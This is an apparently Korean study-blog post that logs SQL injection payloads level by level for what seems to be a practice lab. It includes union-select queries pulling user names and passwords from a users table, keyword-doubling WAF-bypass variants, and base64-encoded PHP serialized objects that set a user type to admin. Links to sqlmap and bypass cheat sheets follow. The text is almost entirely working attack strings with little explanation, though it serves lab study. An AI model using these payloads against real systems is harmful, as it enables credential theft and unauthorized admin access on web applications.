SQLi 기록 본문
lv2:
-1' union select version(), database(), 3, 4--+
-1' union select id, user, pass, null from users where id=1--+
-1' union select id, user, pass, null from users where id=2--+
lv3:
-1%27+order+by+9--+
-1%27+order+by+5--+
-1%27+order+by+4--+
-1'+unionon+select+database(),version(),(select+user+from+users+order+by+id+asc+limit+1),4--+
-1%27+unionon+all+select+id,user,pass,4+from+users--+
lv4:
-1%27+order+by+5+--+
-1%27+union+select+id,version(),user,pass,5+from+users--+
lv7:
-1+union+select+1,version(),3--+" target="_blank" rel="noopener">-1+union+select+1,version(),3--+
lv8:
(-1)union(sselectelect(version()),(database()),(user()))
(-1)union(sselectelect(sselectelect(pass)from(users)where(id=1)),(sselectelect(user)from(users)where(id=1)),(user()))
[SQL Injection - medium]
czoxMToiP2FjdD1kYWZ0YXIiOw==
s:11:"?act=daftar";
a:2:{s:4:"user";s:9:"admincool";s:9:"user_type";s:5:"admin";}
YToyOntzOjQ6InVzZXIiO3M6OToiYWRtaW5jb29sIjtzOjk6InVzZXJfdHlwZSI7czo1OiJhZG1pbiI7fQ==
역직렬화
SQLi 기초
https://mrrootable.tistory.com/25
MS SQLi 정리 (SQL Server 2005 이하)
sqlmap 명령어
https://m.blog.naver.com/koromoon/220413846103
https://github.com/sqlmapproject/sqlmap/wiki/Usage
기타등등
https://security04.tistory.com/171
https://hyunmini.tistory.com/59
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
'Study > WEB' 카테고리의 다른 글
JSP 업로드 우회 (0) | 2020.09.01 |
---|---|
불충분한 인증/인가 (0) | 2020.03.18 |
XSS(Cross-Site Scripting) 종류 및 특징 (0) | 2019.03.14 |
Chrome DevTools (크롬 개발자 도구) (0) | 2019.02.15 |
SSL/TLS와 HTTPS (0) | 2017.11.23 |